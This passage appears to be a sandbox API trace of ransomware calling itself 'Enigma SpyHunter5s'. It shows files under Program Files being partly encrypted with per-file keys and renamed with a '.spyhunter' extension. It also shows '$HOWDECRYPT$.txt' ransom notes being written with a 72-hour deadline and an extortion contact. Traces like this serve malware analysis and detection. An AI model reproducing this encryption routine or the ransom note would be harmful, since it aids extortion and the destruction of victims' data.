[0177.862] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.spyhunter") returned 156 [0177.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll.spyhunter")) returned 1 [0177.863] GetProcessHeap () returned 0x2c0000 [0177.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.864] GetProcessHeap () returned 0x2c0000 [0177.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.864] GetProcessHeap () returned 0x2c0000 [0177.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d09d30 | out: hHeap=0x2c0000) returned 1 [0177.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.865] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.865] WriteFile (in: hFile=0x178, lpBuffer=0x57e39b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x57e39b*, lpNumberOfBytesWritten=0x57e4c4*=0x127, lpOverlapped=0x0) returned 1 [0177.866] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.866] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e4c4*=0x2ac, lpOverlapped=0x0) returned 1 [0177.866] CloseHandle (hObject=0x178) returned 1 [0177.867] GetProcessHeap () returned 0x2c0000 [0177.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee6f10 | out: hHeap=0x2c0000) returned 1 [0177.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e460 | out: pbBuffer=0x57e460) returned 1 [0177.867] GetProcessHeap () returned 0x2c0000 [0177.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e458*=0x30) returned 1 [0177.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.868] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll") returned 157 [0177.868] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.868] GetProcessHeap () returned 0x2c0000 [0177.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0177.868] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e41c*=0x2800, lpOverlapped=0x0) returned 1 [0178.105] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.105] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e41c*=0x2800, lpOverlapped=0x0) returned 1 [0178.105] GetProcessHeap () returned 0x2c0000 [0178.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.106] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.106] WriteFile (in: hFile=0x178, lpBuffer=0x57e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x57e45c*, lpNumberOfBytesWritten=0x57e41c*=0x4, lpOverlapped=0x0) returned 1 [0178.106] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e41c*=0x30, lpOverlapped=0x0) returned 1 [0178.106] CloseHandle (hObject=0x178) returned 1 [0178.106] GetProcessHeap () returned 0x2c0000 [0178.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.106] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.spyhunter") returned 167 [0178.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll.spyhunter")) returned 1 [0178.108] GetProcessHeap () returned 0x2c0000 [0178.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.109] GetProcessHeap () returned 0x2c0000 [0178.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.109] GetProcessHeap () returned 0x2c0000 [0178.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d09a38 | out: hHeap=0x2c0000) returned 1 [0178.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e460 | out: pbBuffer=0x57e460) returned 1 [0178.115] GetProcessHeap () returned 0x2c0000 [0178.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.115] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e458*=0x30) returned 1 [0178.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.116] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll") returned 152 [0178.116] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll", lpSrch=".txt") returned 0x0 [0178.116] GetProcessHeap () returned 0x2c0000 [0178.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.116] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e41c*=0x2800, lpOverlapped=0x0) returned 1 [0178.162] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.162] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e41c*=0x2800, lpOverlapped=0x0) returned 1 [0178.162] GetProcessHeap () returned 0x2c0000 [0178.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.162] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.162] WriteFile (in: hFile=0x178, lpBuffer=0x57e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x57e45c*, lpNumberOfBytesWritten=0x57e41c*=0x4, lpOverlapped=0x0) returned 1 [0178.162] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e41c*=0x30, lpOverlapped=0x0) returned 1 [0178.162] CloseHandle (hObject=0x178) returned 1 [0178.162] GetProcessHeap () returned 0x2c0000 [0178.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.162] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.spyhunter") returned 162 [0178.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll.spyhunter")) returned 1 [0178.163] GetProcessHeap () returned 0x2c0000 [0178.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.163] GetProcessHeap () returned 0x2c0000 [0178.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.163] GetProcessHeap () returned 0x2c0000 [0178.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e54948 | out: hHeap=0x2c0000) returned 1 [0178.164] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e458 | out: pbBuffer=0x57e458) returned 1 [0178.164] GetProcessHeap () returned 0x2c0000 [0178.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.164] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e450*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e450*=0x30) returned 1 [0178.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.165] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb") returned 88 [0178.165] StrStrW (lpFirst="VSTARemotingServer.tlb", lpSrch=".txt") returned 0x0 [0178.165] GetProcessHeap () returned 0x2c0000 [0178.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.165] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e414*=0x8f4, lpOverlapped=0x0) returned 1 [0178.171] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff70c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.171] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x8f4, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e414*=0x8f4, lpOverlapped=0x0) returned 1 [0178.171] GetProcessHeap () returned 0x2c0000 [0178.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.171] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.171] WriteFile (in: hFile=0x178, lpBuffer=0x57e454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x57e454*, lpNumberOfBytesWritten=0x57e414*=0x4, lpOverlapped=0x0) returned 1 [0178.171] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e414*=0x30, lpOverlapped=0x0) returned 1 [0178.171] CloseHandle (hObject=0x178) returned 1 [0178.171] GetProcessHeap () returned 0x2c0000 [0178.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.171] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb.spyhunter") returned 98 [0178.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb.spyhunter")) returned 1 [0178.172] GetProcessHeap () returned 0x2c0000 [0178.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.172] GetProcessHeap () returned 0x2c0000 [0178.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.172] GetProcessHeap () returned 0x2c0000 [0178.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d8c0 | out: hHeap=0x2c0000) returned 1 [0178.172] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e458 | out: pbBuffer=0x57e458) returned 1 [0178.172] GetProcessHeap () returned 0x2c0000 [0178.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.172] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e450*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e450*=0x30) returned 1 [0178.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.173] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned 122 [0178.173] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb", lpSrch=".txt") returned 0x0 [0178.173] GetProcessHeap () returned 0x2c0000 [0178.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.173] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e414*=0x2800, lpOverlapped=0x0) returned 1 [0178.181] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.181] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e414*=0x2800, lpOverlapped=0x0) returned 1 [0178.181] GetProcessHeap () returned 0x2c0000 [0178.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.181] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.181] WriteFile (in: hFile=0x178, lpBuffer=0x57e454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x57e454*, lpNumberOfBytesWritten=0x57e414*=0x4, lpOverlapped=0x0) returned 1 [0178.182] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e414, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e414*=0x30, lpOverlapped=0x0) returned 1 [0178.183] CloseHandle (hObject=0x178) returned 1 [0178.183] GetProcessHeap () returned 0x2c0000 [0178.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.183] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.spyhunter") returned 132 [0178.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb.spyhunter")) returned 1 [0178.183] GetProcessHeap () returned 0x2c0000 [0178.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.184] GetProcessHeap () returned 0x2c0000 [0178.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.184] GetProcessHeap () returned 0x2c0000 [0178.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3add8 | out: hHeap=0x2c0000) returned 1 [0178.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.184] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.185] WriteFile (in: hFile=0x178, lpBuffer=0x57e387*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e4b0, lpOverlapped=0x0 | out: lpBuffer=0x57e387*, lpNumberOfBytesWritten=0x57e4b0*=0x127, lpOverlapped=0x0) returned 1 [0178.186] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.186] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e4b0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e4b0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.186] CloseHandle (hObject=0x178) returned 1 [0178.187] GetProcessHeap () returned 0x2c0000 [0178.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9e18 | out: hHeap=0x2c0000) returned 1 [0178.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e450 | out: pbBuffer=0x57e450) returned 1 [0178.187] GetProcessHeap () returned 0x2c0000 [0178.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e448*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e448*=0x30) returned 1 [0178.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.187] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 71 [0178.188] StrStrW (lpFirst="msdia90.dll", lpSrch=".txt") returned 0x0 [0178.188] GetProcessHeap () returned 0x2c0000 [0178.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.188] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, 